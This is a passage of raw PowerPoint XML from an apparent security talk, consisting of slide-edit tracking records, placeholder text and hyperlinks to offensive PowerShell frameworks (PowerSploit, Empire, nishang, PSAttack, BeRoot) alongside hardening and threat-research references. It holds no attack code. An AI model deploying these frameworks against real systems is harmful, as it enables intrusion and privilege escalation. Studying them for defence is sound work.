        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{DDF2462B-1B48-8635-2892-D05F658EFBE5}" dt="2019-06-05T04:24:51.921" v="73" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1926449966" sldId="257"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{DDF2462B-1B48-8635-2892-D05F658EFBE5}" dt="2019-06-05T04:24:51.921" v="73" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1926449966" sldId="257"/>
            <ac:spMk id="2" creationId="{87BB03A3-9C31-4CFE-B7EC-501A92F713CE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{DDF2462B-1B48-8635-2892-D05F658EFBE5}" dt="2019-06-05T03:56:37.558" v="23" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1926449966" sldId="257"/>
            <ac:spMk id="3" creationId="{38858550-EB68-4712-9AA3-FF450953D228}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{DDF2462B-1B48-8635-2892-D05F658EFBE5}" dt="2019-06-05T04:35:59.829" v="83" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2886590775" sldId="258"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{DDF2462B-1B48-8635-2892-D05F658EFBE5}" dt="2019-06-05T04:35:32.095" v="77" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="4" creationId="{8AE5C81D-0FFB-4CBD-BF89-8872B36B94EF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{DDF2462B-1B48-8635-2892-D05F658EFBE5}" dt="2019-06-05T04:35:39.172" v="78" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="6" creationId="{53E9DF78-EFAC-4F59-8611-0FEDADADCA6A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{DDF2462B-1B48-8635-2892-D05F658EFBE5}" dt="2019-06-05T04:35:42.376" v="79" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="7" creationId="{0F04E23D-A26E-4029-B989-CC81B51B3DB5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{DDF2462B-1B48-8635-2892-D05F658EFBE5}" dt="2019-06-05T04:35:46.095" v="80" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="8" creationId="{5B1A0ACD-7B0B-4F6B-AED4-F2F5B2C68BAC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{DDF2462B-1B48-8635-2892-D05F658EFBE5}" dt="2019-06-05T04:35:49.391" v="81" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="11" creationId="{27CA9ED9-F5A6-426C-8EEB-3307AB12BA3E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{DDF2462B-1B48-8635-2892-D05F658EFBE5}" dt="2019-06-05T04:35:59.829" v="83" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="15" creationId="{D96DA130-F79F-4B78-A80E-33354F80026C}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{DDF2462B-1B48-8635-2892-D05F658EFBE5}" dt="2019-06-05T05:22:53.247" v="484" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2809929173" sldId="259"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{DDF2462B-1B48-8635-2892-D05F658EFBE5}" dt="2019-06-05T04:48:46.677" v="130" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2809929173" sldId="259"/>
            <ac:spMk id="2" creationId="{CD06FDCD-F202-44B7-8AAA-17D531BA5E15}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{DDF2462B-1B48-8635-2892-D05F658EFBE5}" dt="2019-06-05T05:11:34.462" v="168" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2809929173" sldId="259"/>
            <ac:spMk id="3" creationId="{E9514551-CD8A-40A6-A998-E7618E31C4FA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{DDF2462B-1B48-8635-2892-D05F658EFBE5}" dt="2019-06-05T05:16:08.543" v="224" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2809929173" sldId="259"/>
            <ac:spMk id="4" creationId="{13474DE2-D7F6-455A-B8DF-0A80C79F7CBA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{DDF2462B-1B48-8635-2892-D05F658EFBE5}" dt="2019-06-05T05:16:15.824" v="225" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2809929173" sldId="259"/>
            <ac:spMk id="5" creationId="{D1CB152A-E8C6-4642-8761-9A7C31E61713}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{DDF2462B-1B48-8635-2892-D05F658EFBE5}" dt="2019-06-05T05:17:07.746" v="231" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2809929173" sldId="259"/>
            <ac:spMk id="6" creationId="{F8B6CE1F-C11B-434D-B9B2-56DE5E15CD25}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{DDF2462B-1B48-8635-2892-D05F658EFBE5}" dt="2019-06-05T05:22:53.247" v="484" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2809929173" sldId="259"/>
            <ac:spMk id="7" creationId="{AF861752-776B-41F8-AB6A-11982047C04F}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{DDF2462B-1B48-8635-2892-D05F658EFBE5}" dt="2019-06-05T06:00:51.049" v="672" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3389707094" sldId="260"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{DDF2462B-1B48-8635-2892-D05F658EFBE5}" dt="2019-06-05T04:45:35.473" v="92" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3389707094" sldId="260"/>
            <ac:spMk id="4" creationId="{C1072647-6C18-4C9E-8B4B-F8295ED393E9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{DDF2462B-1B48-8635-2892-D05F658EFBE5}" dt="2019-06-05T04:45:16.629" v="85" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3389707094" sldId="260"/>
            <ac:spMk id="5" creationId="{5EA71619-7F44-45B9-A914-4CE8B3B96203}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{DDF2462B-1B48-8635-2892-D05F658EFBE5}" dt="2019-06-05T04:45:16.629" v="86" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3389707094" sldId="260"/>
            <ac:spMk id="6" creationId="{E9131EC6-F179-44CF-92B2-150516411302}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{DDF2462B-1B48-8635-2892-D05F658EFBE5}" dt="2019-06-05T04:45:16.645" v="87" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3389707094" sldId="260"/>
            <ac:spMk id="7" creationId="{A0ACCE37-DFD4-4F05-9F63-DB5BBF156C6C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{DDF2462B-1B48-8635-2892-D05F658EFBE5}" dt="2019-06-05T04:45:16.645" v="88" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3389707094" sldId="260"/>
            <ac:spMk id="8" creationId="{C5184F34-5CD6-4F2B-8331-3C64F01D347F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{DDF2462B-1B48-8635-2892-D05F658EFBE5}" dt="2019-06-05T04:45:16.661" v="89" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3389707094" sldId="260"/>
            <ac:spMk id="9" creationId="{50EB8D91-27F6-475F-B492-10CF534F0296}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{DDF2462B-1B48-8635-2892-D05F658EFBE5}" dt="2019-06-05T04:45:16.676" v="90" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3389707094" sldId="260"/>
            <ac:spMk id="10" creationId="{803F2287-8D29-443A-B474-51DD77920CF6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{DDF2462B-1B48-8635-2892-D05F658EFBE5}" dt="2019-06-05T04:45:22.911" v="91" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3389707094" sldId="260"/>
            <ac:spMk id="11" creationId="{4433FC25-B531-47BF-9B5B-3260DC990C9B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{DDF2462B-1B48-8635-2892-D05F658EFBE5}" dt="2019-06-05T06:00:51.049" v="672" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3389707094" sldId="260"/>
            <ac:spMk id="12" creationId="{D0165FD3-F8E2-4C88-B2C0-2825257D3E95}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp ord">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{DDF2462B-1B48-8635-2892-D05F658EFBE5}" dt="2019-06-05T06:35:33.069" v="1260"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1727781075" sldId="261"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{DDF2462B-1B48-8635-2892-D05F658EFBE5}" dt="2019-06-05T05:59:19.424" v="635" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1727781075" sldId="261"/>
            <ac:spMk id="3" creationId="{2E57E17D-B5F0-46C7-9504-7C20ABA2E4F1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{DDF2462B-1B48-8635-2892-D05F658EFBE5}" dt="2019-06-05T05:59:19.346" v="632" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1727781075" sldId="261"/>
            <ac:spMk id="4" creationId="{738ABD5B-44C3-4BF8-9232-2B17C43E1C9D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{DDF2462B-1B48-8635-2892-D05F658EFBE5}" dt="2019-06-05T05:59:19.377" v="633" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1727781075" sldId="261"/>
            <ac:spMk id="5" creationId="{6AA73F9F-6A4A-4B5C-8355-CDB1E8885A7C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{DDF2462B-1B48-8635-2892-D05F658EFBE5}" dt="2019-06-05T05:59:19.393" v="634" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1727781075" sldId="261"/>
            <ac:spMk id="6" creationId="{81DFE1AE-A13A-4DAC-9A43-B1A285A26948}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="ord">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{DDF2462B-1B48-8635-2892-D05F658EFBE5}" dt="2019-06-05T06:35:39.569" v="1261"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3166696917" sldId="263"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp ord">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{DDF2462B-1B48-8635-2892-D05F658EFBE5}" dt="2019-06-05T06:34:35.444" v="1258" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="458480970" sldId="267"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{DDF2462B-1B48-8635-2892-D05F658EFBE5}" dt="2019-06-05T06:18:54.426" v="701" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="458480970" sldId="267"/>
            <ac:spMk id="2" creationId="{1DC159E3-3631-49B8-9B11-070A004CD8BC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{DDF2462B-1B48-8635-2892-D05F658EFBE5}" dt="2019-06-05T06:33:41.944" v="1192" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="458480970" sldId="267"/>
            <ac:spMk id="3" creationId="{5C06839A-07D9-486F-8E73-76B7F83813F8}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{DDF2462B-1B48-8635-2892-D05F658EFBE5}" dt="2019-06-05T06:20:17.005" v="751" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="458480970" sldId="267"/>
            <ac:spMk id="4" creationId="{B7028FE2-194E-43EB-86DD-66B674C2E9B5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{DDF2462B-1B48-8635-2892-D05F658EFBE5}" dt="2019-06-05T06:33:31.725" v="1189" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="458480970" sldId="267"/>
            <ac:spMk id="5" creationId="{CAF3DF89-A507-4527-8C36-8E1BA28FE08E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{DDF2462B-1B48-8635-2892-D05F658EFBE5}" dt="2019-06-05T06:34:35.444" v="1258" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="458480970" sldId="267"/>
            <ac:spMk id="6" creationId="{2E827771-FE4C-49C9-ADDF-EA5517120AD0}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{DDF2462B-1B48-8635-2892-D05F658EFBE5}" dt="2019-06-05T03:50:22.775" v="18" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="917986403" sldId="268"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{DDF2462B-1B48-8635-2892-D05F658EFBE5}" dt="2019-06-05T03:50:22.775" v="18" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="917986403" sldId="268"/>
            <ac:spMk id="2" creationId="{0D8FB6DB-E2C3-44E9-BC28-FB08080DA7EF}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{DDF2462B-1B48-8635-2892-D05F658EFBE5}" dt="2019-06-05T05:58:08.205" v="630" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2696278330" sldId="270"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{DDF2462B-1B48-8635-2892-D05F658EFBE5}" dt="2019-06-05T05:56:10.595" v="571"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2696278330" sldId="270"/>
            <ac:spMk id="3" creationId="{FED57F92-7849-4866-BB80-06B758A6215D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{DDF2462B-1B48-8635-2892-D05F658EFBE5}" dt="2019-06-05T05:58:08.205" v="630" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2696278330" sldId="270"/>
            <ac:spMk id="4" creationId="{0F466325-8DB1-47C8-A7D4-280079B59A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7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Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="uk-UA"/>
              <a:t>Second level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="uk-UA"/>
              <a:t>Third level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="uk-UA"/>
              <a:t>Fourth level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="uk-U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Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="uk-UA"/>
              <a:t>Second level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="uk-UA"/>
              <a:t>Third level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="uk-UA"/>
              <a:t>Fourth level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="uk-U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6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Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="uk-UA"/>
              <a:t>Second level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="uk-UA"/>
              <a:t>Third level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="uk-UA"/>
              <a:t>Fourth level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="uk-U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2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4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Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="uk-UA"/>
              <a:t>Second level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="uk-UA"/>
              <a:t>Third level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="uk-UA"/>
              <a:t>Fourth level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="uk-U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Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="uk-UA"/>
              <a:t>Second level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="uk-UA"/>
              <a:t>Third level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="uk-UA"/>
              <a:t>Fourth level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="uk-U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8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Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="uk-UA"/>
              <a:t>Second level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="uk-UA"/>
              <a:t>Third level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="uk-UA"/>
              <a:t>Fourth level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="uk-U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Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="uk-UA"/>
              <a:t>Second level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="uk-UA"/>
              <a:t>Third level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="uk-UA"/>
              <a:t>Fourth level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="uk-U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3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5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1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Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="uk-UA"/>
              <a:t>Second level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="uk-UA"/>
              <a:t>Third level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="uk-UA"/>
              <a:t>Fourth level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="uk-U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3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Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="uk-UA"/>
              <a:t>Second level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="uk-UA"/>
              <a:t>Third level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="uk-UA"/>
              <a:t>Fourth level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="uk-U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62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ssandroZ/BeRoot" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/PowerShellMafia/PowerSploit/tree/master/Prives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zdww.com/article/318239/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/enjoiz/Privesc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pireProject/Empire" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/PowerShellMafia/PowerSplo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aredhaight/PSAttack" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/samratashok/nishang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allery.technet.microsoft.com/SAMRi10-Hardening-Remote-48d94b5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an-unit42/iocs/tree/master/psencmds" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20190508170906/https:/unit42.paloaltonetworks.com/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/" 